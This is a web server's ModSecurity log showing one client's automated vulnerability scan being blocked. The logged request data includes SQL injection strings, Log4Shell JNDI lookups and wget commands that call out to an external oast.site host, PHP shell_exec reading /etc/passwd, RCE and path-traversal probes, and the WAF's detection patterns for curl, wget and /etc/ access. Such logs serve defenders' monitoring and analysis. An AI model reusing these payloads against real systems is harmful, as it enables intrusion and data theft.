[unique_id "ZO10X8Co-f0AAAO874cAAAAF"]
[Tue Aug 29 11:30:23.327973 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAPNBRIAAAAZ"]
[Tue Aug 29 11:30:24.311524 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAOIvTkAAAAM"]
[Tue Aug 29 11:30:24.365111 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAPNBRUAAAAZ"]
[Tue Aug 29 11:30:25.307809 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAPXAkwAAAAi"]
[Tue Aug 29 11:30:25.311100 2023] [:error] [pid 991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YcCo-f0AAAPfm7UAAAAR"]
[Tue Aug 29 11:30:25.406893 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlg11wwq8bmf9hq4.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAO-1o0AAAAI"]
[Tue Aug 29 11:30:27.510550 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10Y8Co-f0AAAOH4SsAAAAH"]
[Tue Aug 29 11:30:27.520154 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10Y8Co-f0AAAOH4SsAAAAH"]
[Tue Aug 29 11:30:28.318848 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZMCo-f0AAAPXAlEAAAAi"]
[Tue Aug 29 11:30:29.394875 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZcCo-f0AAANjpyQAAAAT"]
[Tue Aug 29 11:30:30.512095 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAPENdQAAAAQ"]
[Tue Aug 29 11:30:30.524878 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10ZsCo-f0AAAO875sAAAAF"]
[Tue Aug 29 11:30:32.643353 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAPXAl4AAAAi"]
[Tue Aug 29 11:30:33.420155 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAOOuVgAAAAW"]
[Tue Aug 29 11:30:33.653006 2023] [:error] [pid 1008] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilibft.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10acCo-f0AAAPw@TgAAAAR"]
[Tue Aug 29 11:30:34.367847 2023] [:error] [pid 1008] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlg3a1sfn3pzd613.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAAPw@ToAAAAR"]
[Tue Aug 29 11:30:34.460508 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPXAmgAAAAi"]
[Tue Aug 29 11:30:34.474845 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPXAmgAAAAi"]
[Tue Aug 29 11:30:35.346762 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAAPv-EkAAAAM"]
[Tue Aug 29 11:30:35.932740 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10a8Co-f0AAAPxBSYAAAAS"]
[Tue Aug 29 11:30:36.457469 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bMCo-f0AAAPahwgAAAAL"]
[Tue Aug 29 11:30:37.359720 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAPxBSwAAAAS"]
[Tue Aug 29 11:30:37.408186 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAPMmA4AAAAY"]
[Tue Aug 29 11:30:37.612607 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAOH4UoAAAAH"]
[Tue Aug 29 11:30:37.644438 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAPiBhIAAAAB"]
[Tue Aug 29 11:30:39.507646 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPyOEMAAAAR"]
[Tue Aug 29 11:30:39.509444 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPyOEMAAAAR"]
[Tue Aug 29 11:30:39.522789 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAO877MAAAAF"]
[Tue Aug 29 11:30:41.862077 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10ccCo-f0AAAPRNbkAAAAf"]
[Tue Aug 29 11:30:42.700907 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAOKNpgAAAAK"]
[Tue Aug 29 11:30:43.308808 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAOKNpkAAAAK"]
[Tue Aug 29 11:30:43.444879 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlgen11wt6oj1weq.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAOKNpsAAAAK"]
[Tue Aug 29 11:30:44.418505 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAPRNcIAAAAf"]
[Tue Aug 29 11:30:45.409102 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAPQkg8AAAAe"]
[Tue Aug 29 11:30:46.379439 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10dsCo-f0AAAPv-HIAAAAM"]
